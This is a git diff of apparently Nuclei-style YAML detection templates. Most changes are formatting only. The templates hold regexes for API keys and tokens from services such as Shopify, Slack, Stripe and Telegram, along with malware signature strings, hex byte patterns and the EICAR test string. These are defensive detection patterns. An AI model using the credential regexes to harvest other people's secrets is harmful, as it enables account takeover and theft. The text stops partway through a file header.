b/file/keys/sauce-access-token.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: sauce,token,file - file: - extensions: - all @@ -18,4 +17,4 @@ file: - type: regex part: body regex: - - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' \ No newline at end of file + - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' diff --git a/file/keys/segment-public-api.yaml b/file/keys/segment-public-api.yaml index 4d4ae189f7..e4a1944356 100644 --- a/file/keys/segment-public-api.yaml +++ b/file/keys/segment-public-api.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: segment,token,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '(sgp_[a-zA-Z0-9]{64})' \ No newline at end of file + - '(sgp_[a-zA-Z0-9]{64})' diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index 000c4516ea..3648ce9333 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,sendgrid - file: - extensions: - all diff --git a/file/keys/shopify-custom-token.yaml b/file/keys/shopify-custom-token.yaml index fbdd23d61d..881591e0df 100644 --- a/file/keys/shopify-custom-token.yaml +++ b/file/keys/shopify-custom-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "shpca_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpca_[a-fA-F0-9]{32}" diff --git a/file/keys/shopify-private-token.yaml b/file/keys/shopify-private-token.yaml index 7e308d71f9..089447d20b 100644 --- a/file/keys/shopify-private-token.yaml +++ b/file/keys/shopify-private-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "shppa_[a-fA-F0-9]{32}" \ No newline at end of file + - "shppa_[a-fA-F0-9]{32}" diff --git a/file/keys/shopify-public-access.yaml b/file/keys/shopify-public-access.yaml index fef350f2d1..1c85531484 100644 --- a/file/keys/shopify-public-access.yaml +++ b/file/keys/shopify-public-access.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: shopify,token,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '\b(shpat_[a-fA-F0-9]{32})\b' \ No newline at end of file + - '\b(shpat_[a-fA-F0-9]{32})\b' diff --git a/file/keys/shopify-shared-secret.yaml b/file/keys/shopify-shared-secret.yaml index 8121c35d82..e148f4e03e 100644 --- a/file/keys/shopify-shared-secret.yaml +++ b/file/keys/shopify-shared-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "shpss_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpss_[a-fA-F0-9]{32}" diff --git a/file/keys/shopify-token.yaml b/file/keys/shopify-token.yaml index a60878623e..fe1fb70e5d 100644 --- a/file/keys/shopify-token.yaml +++ b/file/keys/shopify-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "shpat_[a-fA-F0-9]{32}" \ No newline at end of file + - "shpat_[a-fA-F0-9]{32}" diff --git a/file/keys/slack-api.yaml b/file/keys/slack-api.yaml index ea761c24d4..b5e244881f 100644 --- a/file/keys/slack-api.yaml +++ b/file/keys/slack-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all diff --git a/file/keys/slack-webhook.yaml b/file/keys/slack-webhook.yaml index 97548ae165..816fce414b 100644 --- a/file/keys/slack-webhook.yaml +++ b/file/keys/slack-webhook.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all diff --git a/file/keys/square-access-token.yaml b/file/keys/square-access-token.yaml index 5601c992e7..22d366487a 100644 --- a/file/keys/square-access-token.yaml +++ b/file/keys/square-access-token.yaml @@ -5,7 +5,6 @@ info: author: gaurang,daffainfo severity: high tags: token,file,square - file: - extensions: - all diff --git a/file/keys/square-oauth-secret.yaml b/file/keys/square-oauth-secret.yaml index 15571e71bc..fea8fd543e 100644 --- a/file/keys/square-oauth-secret.yaml +++ b/file/keys/square-oauth-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,square - file: - extensions: - all diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml index fd8c124055..8f68fcdbaf 100644 --- a/file/keys/stackhawk-api-key.yaml +++ b/file/keys/stackhawk-api-key.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: token,file - file: - extensions: - all diff --git a/file/keys/stripe-api-key.yaml b/file/keys/stripe-api-key.yaml index d65411c71f..f5ea2532c3 100644 --- a/file/keys/stripe-api-key.yaml +++ b/file/keys/stripe-api-key.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,stripe - file: - extensions: - all diff --git a/file/keys/telegram-token.yaml b/file/keys/telegram-token.yaml index 91a3b6d135..7f98aa4a79 100644 --- a/file/keys/telegram-token.yaml +++ b/file/keys/telegram-token.yaml @@ -11,7 +11,6 @@ info: metadata: verified: true tags: telegram,token,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: regex part: body regex: - - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' \ No newline at end of file + - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' diff --git a/file/keys/twilio-api.yaml b/file/keys/twilio-api.yaml index 9895746a8a..f8db7249f3 100644 --- a/file/keys/twilio-api.yaml +++ b/file/keys/twilio-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file - file: - extensions: - all @@ -13,4 +12,4 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" diff --git a/file/keys/twitter-secret.yaml b/file/keys/twitter-secret.yaml index 79c3de94bc..66c91b5599 100644 --- a/file/keys/twitter-secret.yaml +++ b/file/keys/twitter-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang,daffainfo severity: medium tags: token,file,twitter - file: - extensions: - all @@ -14,4 +13,4 @@ file: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" - - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" \ No newline at end of file + - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" diff --git a/file/keys/zapier-webhook.yaml b/file/keys/zapier-webhook.yaml index 1959f5574a..8b7a4bbf6d 100644 --- a/file/keys/zapier-webhook.yaml +++ b/file/keys/zapier-webhook.yaml @@ -8,7 +8,6 @@ info: - https://github.com/streaak/keyhacks#Zapier-Webhook-Token - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url tags: token,file,zapier - file: - extensions: - all diff --git a/file/keys/zendesk-secret-key.yaml b/file/keys/zendesk-secret-key.yaml index 79c1fa37ee..ec0856680e 100644 --- a/file/keys/zendesk-secret-key.yaml +++ b/file/keys/zendesk-secret-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: zendesk,file,keys - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/logs/django-framework-exceptions.yaml b/file/logs/django-framework-exceptions.yaml index 7578e833b1..b174d9ff2c 100644 --- a/file/logs/django-framework-exceptions.yaml +++ b/file/logs/django-framework-exceptions.yaml @@ -9,7 +9,6 @@ info: - https://docs.djangoproject.com/en/1.11/ref/exceptions/ - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security tags: file,logs,django - file: - extensions: - all diff --git a/file/logs/python-app-sql-exceptions.yaml b/file/logs/python-app-sql-exceptions.yaml index 639c971f66..0c63ccdcc3 100644 --- a/file/logs/python-app-sql-exceptions.yaml +++ b/file/logs/python-app-sql-exceptions.yaml @@ -9,7 +9,6 @@ info: - https://www.python.org/dev - https://peps.python.org/pep-0249/ tags: file,logs,python,sql - file: - extensions: - all @@ -22,4 +21,4 @@ file: - 'DataError' - 'IntegrityError' - 'ProgrammingError' - - 'OperationalError' \ No newline at end of file + - 'OperationalError' diff --git a/file/logs/ruby-on-rails-framework-exceptions.yaml b/file/logs/ruby-on-rails-framework-exceptions.yaml index 02ebcb753f..490d89ab48 100644 --- a/file/logs/ruby-on-rails-framework-exceptions.yaml +++ b/file/logs/ruby-on-rails-framework-exceptions.yaml @@ -11,7 +11,6 @@ info: - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb tags: file,logs,ruby,rails - file: - extensions: - all diff --git a/file/logs/spring-framework-exceptions.yaml b/file/logs/spring-framework-exceptions.yaml index feea077d23..213a6be720 100644 --- a/file/logs/spring-framework-exceptions.yaml +++ b/file/logs/spring-framework-exceptions.yaml @@ -8,7 +8,6 @@ info: reference: - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html tags: file,logs,spring - file: - extensions: - all diff --git a/file/logs/suspicious-sql-error-messages.yaml b/file/logs/suspicious-sql-error-messages.yaml index 9d2a5be300..8673d0645d 100644 --- a/file/logs/suspicious-sql-error-messages.yaml +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -10,7 +10,6 @@ info: cvss-score: 9.8 cwe-id: CWE-89 tags: file,logs,sql,error - file: - extensions: - all @@ -39,4 +38,4 @@ file: part: body regex: - 'near \"\*\"\: syntax error' - - 'SELECTs to the left and right of UNION do not have the same number of result columns' \ No newline at end of file + - 'SELECTs to the left and right of UNION do not have the same number of result columns' diff --git a/file/malware/aar-malware.yaml b/file/malware/aar-malware.yaml index 826b2d9e3c..d2041ddaf7 100644 --- a/file/malware/aar-malware.yaml +++ b/file/malware/aar-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,4 @@ file: - "$this.Icon" - "{11111-22222-20001-00001}" - "@@@@@" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/adzok-malware.yaml b/file/malware/adzok-malware.yaml index 77504dd278..efe466cd54 100644 --- a/file/malware/adzok-malware.yaml +++ b/file/malware/adzok-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar tags: malware,file - file: - extensions: - all @@ -107,4 +106,4 @@ file: - "Mensaje.classPK" - "inic$ShutdownHook.class" - "resources/icono.pngPK" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/alfa-malware.yaml b/file/malware/alfa-malware.yaml index 3f794408ea..4297028b63 100644 --- a/file/malware/alfa-malware.yaml +++ b/file/malware/alfa-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: diff --git a/file/malware/alienspy-malware.yaml b/file/malware/alienspy-malware.yaml index bd5ead14b3..06f065172c 100644 --- a/file/malware/alienspy-malware.yaml +++ b/file/malware/alienspy-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,4 @@ file: - "password.ini" - "stub/stub.dll" - "c.dat" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/alina-malware.yaml b/file/malware/alina-malware.yaml index 9b4f6141e0..d7b3f4d0bd 100644 --- a/file/malware/alina-malware.yaml +++ b/file/malware/alina-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,4 @@ file: - 'Alina v1.0' - 'POST' - '1[0-2])[0-9]' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/alpha-malware.yaml b/file/malware/alpha-malware.yaml index 667414d798..b039a8c95d 100644 --- a/file/malware/alpha-malware.yaml +++ b/file/malware/alpha-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: diff --git a/file/malware/andromeda-malware.yaml b/file/malware/andromeda-malware.yaml index 64c7732254..ba1d7ed11a 100644 --- a/file/malware/andromeda-malware.yaml +++ b/file/malware/andromeda-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar tags: malware,file - file: - extensions: - all @@ -20,4 +19,4 @@ file: - type: binary binary: - - "1C1C1D03494746" \ No newline at end of file + - "1C1C1D03494746" diff --git a/file/malware/ap0calypse-malware.yaml b/file/malware/ap0calypse-malware.yaml index 55f1f59b8d..bee6d8a2ea 100644 --- a/file/malware/ap0calypse-malware.yaml +++ b/file/malware/ap0calypse-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "Baslik" - "Dosyalars" - "Injecsiyon" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/arcom-malware.yaml b/file/malware/arcom-malware.yaml index a26bb3d29f..422efde112 100644 --- a/file/malware/arcom-malware.yaml +++ b/file/malware/arcom-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -25,4 +24,4 @@ file: - type: binary binary: - - "A3242521" \ No newline at end of file + - "A3242521" diff --git a/file/malware/arkei-malware.yaml b/file/malware/arkei-malware.yaml index aedc5ee182..c8913cb8f0 100644 --- a/file/malware/arkei-malware.yaml +++ b/file/malware/arkei-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - '/server/grubConfig' - '\\files\\' - 'SQLite' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/backoff-malware.yaml b/file/malware/backoff-malware.yaml index 3219fcd564..b1039df15f 100644 --- a/file/malware/backoff-malware.yaml +++ b/file/malware/backoff-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,4 @@ file: - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s' - '%s @ %s' - 'Upload KeyLogs' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/bandook-malware.yaml b/file/malware/bandook-malware.yaml index a7ac27a5c3..f9048cb7d2 100644 --- a/file/malware/bandook-malware.yaml +++ b/file/malware/bandook-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/basicrat-malware.yaml b/file/malware/basicrat-malware.yaml index dfef9b6620..b9d87d2985 100644 --- a/file/malware/basicrat-malware.yaml +++ b/file/malware/basicrat-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara tags: malware,file,basicrat - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - "Error, platform unsupported." - "Persistence successful," - "Persistence unsuccessful," - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/blacknix-malware.yaml b/file/malware/blacknix-malware.yaml index 9b76d44068..605f946ca7 100644 --- a/file/malware/blacknix-malware.yaml +++ b/file/malware/blacknix-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/blackworm-malware.yaml b/file/malware/blackworm-malware.yaml index 0e03c36477..d175b2fc25 100644 --- a/file/malware/blackworm-malware.yaml +++ b/file/malware/blackworm-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -26,4 +24,4 @@ file: - 'TargetMethod' - '000004b0' - 'Microsoft Corporation' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/bluebanana-malware.yaml b/file/malware/bluebanana-malware.yaml index 450c03fec5..c9cbb101e6 100644 --- a/file/malware/bluebanana-malware.yaml +++ b/file/malware/bluebanana-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/bozok-malware.yaml b/file/malware/bozok-malware.yaml index 1b4d7ec3fe..a9be966922 100644 --- a/file/malware/bozok-malware.yaml +++ b/file/malware/bozok-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - "untPlugin" - "gethostbyname" condition: and - case-insensitive: true \ No newline at end of file + case-insensitive: true diff --git a/file/malware/bublik-malware.yaml b/file/malware/bublik-malware.yaml index 31fd9982b4..99bdbd8e66 100644 --- a/file/malware/bublik-malware.yaml +++ b/file/malware/bublik-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - '636F6E736F6C6173' - '636C556E00696E666F2E696E69' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/cap-hookexkeylogger-malware.yaml b/file/malware/cap-hookexkeylogger-malware.yaml index 14535018bf..04ce4588b5 100644 --- a/file/malware/cap-hookexkeylogger-malware.yaml +++ b/file/malware/cap-hookexkeylogger-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar tags: malware,file - file: - extensions: - all @@ -35,4 +34,4 @@ file: - "WH_KEYBOARD" - "WH_KEYBOARD_LL" condition: and - case-insensitive: true \ No newline at end of file + case-insensitive: true diff --git a/file/malware/cerber-malware.yaml b/file/malware/cerber-malware.yaml index 6fa0358c2f..359ab475e4 100644 --- a/file/malware/cerber-malware.yaml +++ b/file/malware/cerber-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara tags: malware,file,cerber - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,4 @@ file: - "38oDr5.vbs" - "8ivq.dll" - "jmsctls_progress32" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml index 259ad785fa..8c2c6e02c7 100644 --- a/file/malware/cerberus-malware.yaml +++ b/file/malware/cerberus-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar tags: malware,file - file: - extensions: - all diff --git a/file/malware/clientmesh-malware.yaml b/file/malware/clientmesh-malware.yaml index 3a8713d7be..c5fc2075b2 100644 --- a/file/malware/clientmesh-malware.yaml +++ b/file/malware/clientmesh-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all @@ -26,4 +25,4 @@ file: - type: binary binary: - - "0000000000000000007E" \ No newline at end of file + - "0000000000000000007E" diff --git a/file/malware/crimson-malware.yaml b/file/malware/crimson-malware.yaml index 8d79c7a766..9e0a430080 100644 --- a/file/malware/crimson-malware.yaml +++ b/file/malware/crimson-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/crunchrat-malware.yaml b/file/malware/crunchrat-malware.yaml index 9e9d618982..ef291e1f1e 100644 --- a/file/malware/crunchrat-malware.yaml +++ b/file/malware/crunchrat-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara tags: malware,file,crunchrat - file: - extensions: - all - matchers: - type: word part: raw @@ -25,4 +23,4 @@ file: - "" - "" condition: and - case-insensitive: true \ No newline at end of file + case-insensitive: true diff --git a/file/malware/cryptxxx-dropper-malware.yaml b/file/malware/cryptxxx-dropper-malware.yaml index df19738c6c..c703026c62 100644 --- a/file/malware/cryptxxx-dropper-malware.yaml +++ b/file/malware/cryptxxx-dropper-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "50653157584346765962486F35" - "43003A005C0042004900450052005C0051006D006B004E0052004C00460000" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/cryptxxx-malware.yaml b/file/malware/cryptxxx-malware.yaml index 07866a3b0b..6b0d5e135e 100644 --- a/file/malware/cryptxxx-malware.yaml +++ b/file/malware/cryptxxx-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: @@ -39,4 +37,4 @@ file: - "524F5E5E4A4F5A4F52000000FFFFFFFF" - "0A000000525E5C41495C4F703D520000" - "FFFFFFFF08000000525E5B4C42474D52" - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/cxpid-malware.yaml b/file/malware/cxpid-malware.yaml index 6019bd1e37..3718c5406c 100644 --- a/file/malware/cxpid-malware.yaml +++ b/file/malware/cxpid-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar tags: malware,file - file: - extensions: - all @@ -24,4 +23,4 @@ file: - type: binary binary: - - "558BECB9380400006A006A004975F9" \ No newline at end of file + - "558BECB9380400006A006A004975F9" diff --git a/file/malware/cythosia-malware.yaml b/file/malware/cythosia-malware.yaml index 081a55ed58..e27e499f78 100644 --- a/file/malware/cythosia-malware.yaml +++ b/file/malware/cythosia-malware.yaml @@ -6,13 +6,11 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - - 'HarvesterSocksBot.Properties.Resources' \ No newline at end of file + - 'HarvesterSocksBot.Properties.Resources' diff --git a/file/malware/darkrat-malware.yaml b/file/malware/darkrat-malware.yaml index 69503ad5c0..40ee15b258 100644 --- a/file/malware/darkrat-malware.yaml +++ b/file/malware/darkrat-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw diff --git a/file/malware/ddostf-malware.yaml b/file/malware/ddostf-malware.yaml index 90db92b876..7d126ff90e 100644 --- a/file/malware/ddostf-malware.yaml +++ b/file/malware/ddostf-malware.yaml @@ -8,7 +8,6 @@ info: - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar tags: malware,file - file: - extensions: - all @@ -27,4 +26,4 @@ file: binary: - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00' - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/derkziel-malware.yaml b/file/malware/derkziel-malware.yaml index 7c2aa65ec2..7cce698bd9 100644 --- a/file/malware/derkziel-malware.yaml +++ b/file/malware/derkziel-malware.yaml @@ -8,11 +8,9 @@ info: - https://bhf.su/threads/137898/ - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,4 @@ file: - 'SteamAppData.vdf' - 'loginusers.vdf' - 'config.vdf' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/dexter-malware.yaml b/file/malware/dexter-malware.yaml index a0a340ab11..6d2b3679f2 100644 --- a/file/malware/dexter-malware.yaml +++ b/file/malware/dexter-malware.yaml @@ -8,11 +8,9 @@ info: - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar - http://goo.gl/oBvy8b tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - '%s\\%s\\%s.exe' - 'Sun Java Security Plugin' - '\\Internet Explorer\\iexplore.exe' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/diamondfox-malware.yaml b/file/malware/diamondfox-malware.yaml index da9087a090..fcd28fc8b0 100644 --- a/file/malware/diamondfox-malware.yaml +++ b/file/malware/diamondfox-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,4 @@ file: - 'P_WALLET' - 'GR_COMMAND' - 'FTPUPLOAD' - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/dmalocker-malware.yaml b/file/malware/dmalocker-malware.yaml index da1c8fc556..73bfed7a5f 100644 --- a/file/malware/dmalocker-malware.yaml +++ b/file/malware/dmalocker-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: diff --git a/file/malware/doublepulsar-malware.yaml b/file/malware/doublepulsar-malware.yaml index f75042ae22..a8bcf98e39 100644 --- a/file/malware/doublepulsar-malware.yaml +++ b/file/malware/doublepulsar-malware.yaml @@ -6,14 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE" - "45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741" - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/eicar-malware.yaml b/file/malware/eicar-malware.yaml index efdae29c31..7043711e3e 100644 --- a/file/malware/eicar-malware.yaml +++ b/file/malware/eicar-malware.yaml @@ -6,13 +6,11 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - - "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" \ No newline at end of file + - "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" diff --git a/file/malware/erebus-malware.yaml b/file/malware/erebus-malware.yaml index bf34157061..3aa5319cba 100644 --- a/file/malware/erebus-malware.yaml +++ b/file/malware/erebus-malware.yaml @@ -6,15 +6,13 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw words: - "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" - "EREBUS IS BEST." - condition: and \ No newline at end of file + condition: and diff --git a/file/malware/ezcob-malware.yaml b/file/malware/ezcob-malware.yaml index 8aa21c0505..c95cbb4253 100644 --- a/file/malware/ezcob-malware.yaml +++ b/file/malware/ezcob-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -20,4 +18,4 @@ file: - 'Ezcob' - 'l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126' - '20110113144935' - condition: or \ No newline at end of file + condition: or diff --git a/file/malware/fudcrypt-malware.yaml b/file/malware/fudcrypt-malware.yaml index 1a257fd1ce..7f78f9b3a7 100644 --- 